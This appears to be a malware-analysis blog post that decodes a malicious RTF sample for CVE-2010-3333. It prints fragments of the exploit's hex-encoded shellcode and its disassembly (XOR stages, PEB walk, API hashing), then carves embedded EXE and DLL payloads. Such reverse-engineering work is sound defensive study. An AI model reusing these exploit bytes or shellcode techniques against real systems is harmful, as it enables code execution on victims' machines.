    vim CVE-2010-3333_DOC.bad
    {\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1;ffffffffff050000000000000000000000..
    ..

Vi can be used as a hex dumper with the following command:

    :%!xxd
    0000000: 7b5c 7274 6631 7b5c 7368 707b 5c2a 5c73  {\rtf1{\shp{\*\s
    0000010: 6870 696e 7374 7b5c 7370 7b5c 736e 2070  hpinst{\sp{\sn p
    0000020: 4672 6167 6d65 6e74 737d 7b5c 7376 2031  Fragments}{\sv 1
    0000030: 3b31 3b66 6666 6666 6666 6666 6630 3530  ;1;ffffffffff050
    0000040: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
    0000050: 3030 3030 3030 3030 3030 3030 3030 3030  0000000000000000
    0000060: 3030 3030 3030 3062 3735 6631 6637 6430  0000000b75f1f7d0
    0000070: 3030 3038 3037 6330 3030 3038 3037 6342  000807c0000807cB
    0000080: 4242 4242 4242 4243 4343 4343 4343 4344  BBBBBBBCCCCCCCCD
    0000090: 4444 4444 4444 4439 3039 3039 3039 3039  DDDDDDD909090909
    00000a0: 3039 3034 3134 3134 3134 3134 3134 3134  0904141414141414
    00000b0: 3134 3134 3134 3134 3134 3165 3830 3130  14141414141e8010
    ....
    0000740: 6239 3838 3730 6436 3730 6439 3839 3833  b98870d670d98983
    0000750: 3038 3366 3766 3766 3766 3766 3766 3766  083f7f7f7f7f7f7f
    0000760: 3765 6230 3665 6230 3430 3932 3330 3033  7eb06eb040923003
    0000770: 3065 6230 3665 6230 3438 6332 3430 3033  0eb06eb048c24003
    0000780: 3065 3837 3766 3466 6666 667d 7d7d 7d5c  0e877f4ffff}}}}\
    0000790: 6164 6566 6c61 6e67 3130 3235 5c61 6e73  adeflang1025\ans
    00007a0: 695c 616e 7369 6370 6739 3336 5c75 6332  i\ansicpg936\uc2
    00007b0: 5c61 6465 6666 3331 3530 375c 6465 6666  \adeff31507\def
    .....
    :%!xxd -r
    :q!

Some quick notes regarding CVE-2010-3333, via Mitre: "Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka 'RTF Stack Buffer Overflow Vulnerability.'"
The intent of this post is not to analyze CVE-2010-3333 but rather the encoding algorithm in the shellcode. For more information on the exploit see the following link. The most relevant parts are the RTF file header, the fragment objects (pFragments) and the data following the semicolon. The shellcode resides in the large block of ASCII data made up of the characters 0-9 and A-F. If we read two ASCII characters at a time and treat each pair as a hex byte, we end up with valid Intel instructions. Let's see what this would look like in Python.
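For readers on Python 3, here is a minimal sketch of the pair-by-pair conversion described above. It is not the session used for this analysis (that one is Python 2.7), and the name `decode_hex_run` is made up for illustration. It stops at the first pair that is not two hex digits, which is assumed to mark the end of the encoded block (for example the closing `}}}}` of the RTF group).

```python
# Python 3 sketch: turn a run of ASCII hex pairs into raw bytes.
# decode_hex_run is a hypothetical helper name, not part of any library.
HEX_DIGITS = b"0123456789abcdefABCDEF"


def decode_hex_run(text: bytes) -> bytes:
    """Decode leading ASCII hex pairs in `text`, stopping at the first non-hex pair."""
    out = bytearray()
    for pos in range(0, len(text) - 1, 2):
        pair = text[pos:pos + 2]
        # Both characters must be hex digits, otherwise the block has ended.
        if pair[0] not in HEX_DIGITS or pair[1] not in HEX_DIGITS:
            break
        out.append(int(pair, 16))
    return bytes(out)


if __name__ == "__main__":
    sample = b"414141e801000000}}}}\\adeflang1025"
    print(decode_hex_run(sample).hex())
```

In practice the input would be the bytes read from the specimen starting at the offset of the encoded shellcode.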
    Python 2.7 (r27:82525, Jul 4 2010, 09:01:59) [MSC v.1500 32 bit (Intel)] on win32
    Type "copyright", "credits" or "license()" for more information.
    >>> import sys
    >>> import os
    >>> import pydasm
    >>> # Open our specimen
    >>> f = open("CVE-2010-3333_DOC.bad","rb")
    >>> f.seek(0x97)
    >>> # 0x97 is the start of the ascii encoded shellcode
    >>> b = f.read(2)
    >>> buff = ""
    >>> while b != '':
            try:
                buff = buff+chr(int(b,16))
                b = f.read(2)
            except ValueError:
                break

The variable buff contains our ASCII-to-binary shellcode. We can use Pydasm to disassemble it.
    >>> offset = 0
    >>> while offset < len(buff):
            i = pydasm.get_instruction(buff[offset:],pydasm.MODE_32)
            print offset , ' ',pydasm.get_instruction_string(i,pydasm.FORMAT_INTEL, offset)
            if not i:
                break
            offset += i.length

    0   inc ecx
    1   inc ecx
    2   inc ecx
    3   inc ecx
    4   inc ecx
    5   inc ecx
    6   inc ecx
    7   inc ecx
    8   inc ecx
    9   inc ecx
    10   inc ecx
    11   inc ecx
    12   call 0x12
    17   add [ebx-0x3b7cdbf4],cl
    23   add al,0x8d
    25   dec ecx
    26   adc al,[ecx-0x80]
    29   xor [edi-0x80],esp
    32   cmp [eax+0x600df775],edx
    38   psubd mm6,[esi]
    ....
    85   push dword 0x1300f74
    90   push byte 0xffffff98
    92   None

Notice that after address 12 the code turns into junk instructions. The call at offset 12 is five bytes long and targets 0x12 (18), so the byte at offset 17 is never executed, but our linear disassembly resumes there and ends up off by one byte. We can modify our pydasm loop to skip this null byte.
    >>> offset = 0
    >>> while offset < len(buff):
            i = pydasm.get_instruction(buff[offset:],pydasm.MODE_32)
            print hex(offset) , ' ',pydasm.get_instruction_string(i,pydasm.FORMAT_INTEL, offset)
            if not i:
                break
            offset += i.length
            if offset == 17:
                offset += 1

    0x0   inc ecx
    0x1L   inc ecx
    0x2L   inc ecx
    0x3L   inc ecx
    0x4L   inc ecx
    0x5L   inc ecx
    0x6L   inc ecx
    0x7L   inc ecx
    0x8L   inc ecx
    0x9L   inc ecx
    0xaL   inc ecx
    0xbL   inc ecx
    0xcL   call 0x12
    0x12L   mov ecx,[esp]
    0x15L   add esp,0x4
    0x18L   lea ecx,[ecx+0x12]
    0x1bL   inc ecx
    0x1cL   xor byte [ecx],0x67
    0x1fL   cmp byte [ecx],0x90
    0x22L   jnz 0x1b
    0x24L   or eax,0x36fa0f60
    .......
    0x53L   aad 0x51
    0x55L   push dword 0x1300f74
    0x5aL   push byte 0xffffff98
    0x5cL   None

Note: the addresses are now printed in hex. At address 0x12 we can see the start of the XOR loop with a key of 0x67. The rest of the code looks like junk because it is still XORed. The next step is to get to the second stage of the shellcode.
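As an aside, the decoder stub in the listing above can be mirrored almost instruction for instruction. The following Python 3 sketch is an illustration only (the name `run_xor_stub` is made up): it XORs each byte in place and stops once a decoded byte equals the terminator, the way `xor byte [ecx],0x67` / `cmp byte [ecx],0x90` / `jnz` does. Reading the stub, the first decoded byte appears to be at offset 0x24: the call pushes return address 0x11, `lea` adds 0x12, and `inc ecx` runs once before the first XOR.

```python
# Python 3 sketch of the single-byte XOR stub (key 0x67, stops on a decoded 0x90).
# run_xor_stub is a hypothetical name used only for this illustration.
def run_xor_stub(blob: bytes, start: int, key: int = 0x67, stop: int = 0x90) -> bytes:
    """XOR bytes from `start` onward; stop after the first byte that decodes to `stop`."""
    out = bytearray(blob)
    for pos in range(start, len(out)):
        out[pos] ^= key          # xor byte [ecx], key
        if out[pos] == stop:     # cmp byte [ecx], stop / jnz loop
            break
    return bytes(out)


if __name__ == "__main__":
    plain = bytes([0x6A, 0x07, 0x31, 0xD2, 0x90])
    blob = b"\x41" * 4 + bytes(b ^ 0x67 for b in plain) + b"\xAA\xBB"
    print(run_xor_stub(blob, 4).hex())
```

Bytes after the terminator are left untouched, which matches what the stub would do at run time.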
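    >>> buff2 = buff[:35] # Read past XOR loop
    >>> c = 36
    >>> while c < (len(buff)-36):
            buff2 = buff2 + chr(ord(buff[c])^0x67)
            c += 1

The above code is a simple XOR loop. Note that the encoded data begins at offset 0x24 (36), so slicing with buff[:35] drops the second byte of the jnz. The listing that follows is therefore shifted by one byte from 0x23 onward, which is why the jnz target reads 0x8e instead of 0x1b. Now we can disassemble the second stage using Pydasm.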
    >>> offset = 0
    >>> while offset < len(buff2):
            i = pydasm.get_instruction(buff2[offset:],pydasm.MODE_32)
            print hex(offset) , ' ',pydasm.get_instruction_string(i,pydasm.FORMAT_INTEL, offset)
            if not i:
                break
            offset += i.length
            if offset == 17:
                offset += 1

    0x0   inc ecx
    0x1L   inc ecx
    0x2L   inc ecx
    0x3L   inc ecx
    0x4L   inc ecx
    0x5L   inc ecx
    0x6L   inc ecx
    0x7L   inc ecx
    0x8L   inc ecx
    0x9L   inc ecx
    0xaL   inc ecx
    0xbL   inc ecx
    0xcL   call 0x12
    0x12L   mov ecx,[esp]
    0x15L   add esp,0x4
    0x18L   lea ecx,[ecx+0x12]
    0x1bL   inc ecx
    0x1cL   xor byte [ecx],0x67
    0x1fL   cmp byte [ecx],0x90
    0x22L   jnz 0x8e
    0x24L   pop es
    0x25L   push dword 0x3519d
    0x2aL   push dword 0x2d000
    0x2fL   push dword 0x819d
    ........
    0x8fL   xor edx,edx
    0x91L   mov ebx,fs:[edx+0x30]    ; GET PEB
    0x95L   mov ecx,[ebx+0xc]
    0x98L   mov ecx,[ecx+0x1c]
    ....
    0xbaL   mov esi,[ebx+edi*4]
    0xbdL   add esi,ebp
    0xbfL   cwd
    0xc0L   movsx eax,[esi]
    0xc3L   cmp al,ah
    0xc5L   jz 0xcf
    0xc7L   ror edx,0x7              ; ROR API HASH
    0xcaL   add edx,eax
    0xccL   inc esi
    0xcdL   jmp 0xc0
    ...
    0x1b1L   mov [ebp+0x604],ebx
    0x1b7L   xor ecx,ecx
    0x1b9L   lea esi,[ebp+ecx+0x200]
    0x1c0L   lodsb
    0x1c1L   xor al,cl               ; decode
    0x1c3L   xchg edx,edi
    0x1c5L   lea edi,[ebp+ecx+0x200]
    0x1ccL   stosb
    0x1cdL   xchg edx,edi
    0x1cfL   inc ecx
    0x1d0L   cmp ecx,[ebp+0x604]
    0x1d6L   jnz 0x1b9               ; loop
    ...
    0x34eL   push ebp
    0x34fL   mov ebp,esp
    0x351L   mov eax,[edi-0x14]
    0x354L   inc [eax]

Now we have our shellcode. If we scroll up we will see a loop with xor al, cl followed by an inc ecx. This is our xor-count-up loop: each byte is XORed with a counter that increases by one per byte. This type of encoding can be tricky because we have to know the exact offset where the loop starts decoding data. Usually this means we would have to do some good old-fashioned static analysis. There are only so many times we can reverse shellcode before we get bored. Let's get creative. Let's try something that hasn't been done before (probably wrong?). We know it's a xor-count-up, so let's mimic the pattern the XOR would create in null data.
    >>> o = open('out.bin','wb+')
    >>> d = f.read()
    >>> k = ''
    >>> for x in range(0,0xff):
            k = k + chr(x)

    >>> k
    '\x00\x01\x02\x03\x04\x05\x06\x07\x08\t\n\x0b\x0c\r...'
    >>> # Get subset of the full XOR-Countup output
    >>> key = k[:15]

Note: The k value was edited due to formatting issues. For a screenshot of the output please see the following link.
This is where things get kind of interesting with the encoding. First we search for a subset (key) of the recurring pattern (k). The pattern shows up wherever a run of null bytes has been XORed with the count-up, because XORing zero with the counter leaves the counter itself. We use a subset because the full pattern is unlikely to be present: that would need a run of at least 255 null bytes. If we know the offset where key is found and we know the algorithm, we can work backwards to the counter value (0x00-0xFF) that was applied to the first byte of the data. Once we have that information we just need to mimic the xor-count-up code from the start of the data.
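The reasoning above can be sketched as two small Python 3 functions. This is an illustration under stated assumptions, not the session used for this post: the names `find_countup_start` and `xor_countup` are made up, the counter is assumed to be a single byte that wraps at 0x100, and the data is assumed to contain at least one run of null bytes long enough to cover the probe.

```python
# Python 3 sketch of the xor-count-up recovery trick.
# find_countup_start and xor_countup are hypothetical names for this illustration.
def find_countup_start(data: bytes, probe_len: int = 15) -> int:
    """Return the counter value that was applied to data[0]."""
    # Null bytes XORed with a counter that has just wrapped look like 00 01 02 ...
    probe = bytes(range(probe_len))
    pos = data.find(probe)
    if pos < 0:
        raise ValueError("count-up pattern not found")
    # The counter is 0 at `pos`, so count backwards (mod 256) to offset 0.
    return (-pos) & 0xFF


def xor_countup(data: bytes, start: int) -> bytes:
    """XOR every byte with a counter that begins at `start` and wraps at 0x100."""
    return bytes(b ^ ((start + n) & 0xFF) for n, b in enumerate(data))


if __name__ == "__main__":
    plain = b"MZ" + bytes(300) + b"This program cannot be run in DOS mode."
    encoded = xor_countup(plain, 0x5A)
    start = find_countup_start(encoded)
    print(hex(start), xor_countup(encoded, start) == plain)
```

Because XOR is its own inverse, the same `xor_countup` call both encodes and decodes. A short probe can match by coincidence in arbitrary data, so the decoded output is worth a sanity check (for example, looking for readable strings).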
    >>> #
    >>> i = (0xff - (d.find(key)&0xff)) + 1
    >>> b= ''
    >>> for val in d:
            b = str(b) + chr(ord(val)^(i&0xff))
            i += 1

    >>> o.write(b)
    >>> o.close()
    >>> f.close()
    >>>

Let's see what our saved buffer looks like in a Vim hexdump.
    vim out.bin
    0000000: 8d8c ae92 9090 909b 9997 9dca cccf cba3  ................
    0000010: 616f 716a 5864 6874 616a 7a6c 353e 3853  aoqjXdhtajzl5>8S
    0000020: 6572 204f 7571 7371 7e2a 2b2e 2c2a 427b  er Ouqsq~*+.,*B{
    0000030: 4547 4413 7856 5254 404f 4e49 4f45 1d1e  EGD.xVRT@ONIOE..
    0000040: 0501 076f 4741 455f 5e55 5558 540e 0f0a  ...oGAE_^UUXT...
    0000050: 7077 1e30 3036 2e21 2020 2923 7f7c 7b7f  pw.006.! )#.|{.
    0000060: 660d 2127 273d 3035 316a 6b6e 6c6a 023b  f.!''=051jknlj.;
    ..
    :/This
    00255b0: 0000 0000 0408 b004 4d5a 9000 0300 0000  ........MZ......
    00255c0: 0400 0000 ffff 0000 b800 0000 0000 0000  ................
    00255d0: 4000 0000 0000 0000 0000 0000 0000 0000  @...............
    00255e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
    00255f0: 0000 0000 f000 0000 0e1f ba0e 00b4 09cd  ................
    0025600: 21b8 014c cd21 5468 6973 2070 726f 6772  !..L.!This progr
    0025610: 616d 2063 616e 6e6f 7420 6265 2072 756e  am cannot be run
    0025620: 2069 6e20 444f 5320 6d6f 6465 2e0d 0d0a   in DOS mode....
    0025630: 2400 0000 0000 0000 b3bf 303a f7de 5e69  $.........0:..^i
    :q!

Yeah, that's hot. Now that we have the file decoded we can carve the executable out of the data stream. The first indicator of an embedded executable is the MZ header. If we find the MZ header we would need to jump 0x3c bytes, read the value, jump to that value, check for the PE header... or we could use pefile to validate the PE file for us. All we need to do is search the stream for the MZ header, set the file pointer to that address, read until end of file, pass the data to pefile and then check for errors. If there are no errors we have pefile trim the file and then write it to disk. This might not be the best method if the file is large or if we are concerned about file overlays.
    import pefile
    import re
    import sys

    def carve(f):
        c = 1
        # Treat every MZ signature in the stream as a possible PE start
        for y in [tmp.start() for tmp in re.finditer('\x4d\x5a',f.read())]:
            f.seek(y)
            try:
                pe = pefile.PE(data=f.read())
            except Exception:
                # Not a valid PE at this offset, try the next MZ
                continue
            # determine file ext
            ext = ''
            if pe.is_dll():
                ext = 'dll'
            if pe.is_driver():
                ext = 'sys'
            if pe.is_exe():
                ext = 'exe'
            o = open(str(c)+ '.' + ext, 'wb')
            print ext , 'found at offset', hex(y)
            # trim() drops any data past the end of the PE image
            o.write(pe.trim())
            o.close()
            c = c + 1
            f.seek(0)
            pe.close()

    def main(argv):
        if len(sys.argv) < 2:
            print "cpe.py <file-stream>"
        else:
            i = open(sys.argv[1], "rb")
            carve(i)
            i.close()

    if __name__== '__main__':
        main(sys.argv[1:])

Output from the above script on out.bin:
    python cpe.py out.bin
    exe found at offset 0x7a10
    dll found at offset 0x255b8
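For comparison, the manual check mentioned earlier (find MZ, read the 4-byte value at offset 0x3c, follow it, and look for the PE signature) can be sketched in Python 3 with only the standard library. This is a rough pre-filter rather than a replacement for pefile: it does not validate sections or trim the file, and the function names are made up for illustration.

```python
# Python 3 sketch of the manual MZ -> e_lfanew -> "PE\0\0" check.
# looks_like_pe and find_pe_candidates are hypothetical helper names.
import struct


def looks_like_pe(data: bytes, mz_off: int) -> bool:
    """True if an MZ header at mz_off points at a PE signature."""
    if data[mz_off:mz_off + 2] != b"MZ":
        return False
    field = data[mz_off + 0x3C:mz_off + 0x40]
    if len(field) < 4:
        return False
    # The 32-bit little-endian value at 0x3c is the offset of the PE header.
    (e_lfanew,) = struct.unpack("<I", field)
    pe_off = mz_off + e_lfanew
    return data[pe_off:pe_off + 4] == b"PE\x00\x00"


def find_pe_candidates(data: bytes) -> list:
    """Return offsets of every MZ signature that leads to a PE signature."""
    hits = []
    pos = data.find(b"MZ")
    while pos != -1:
        if looks_like_pe(data, pos):
            hits.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return hits


if __name__ == "__main__":
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = struct.pack("<I", 0x40)
    hdr[0x40:0x44] = b"PE\x00\x00"
    stream = b"junkMZjunk" + bytes(hdr) + b"tail"
    print([hex(off) for off in find_pe_candidates(stream)])
```

Offsets that pass this check could then be handed to pefile for full validation and trimming, as the script above does.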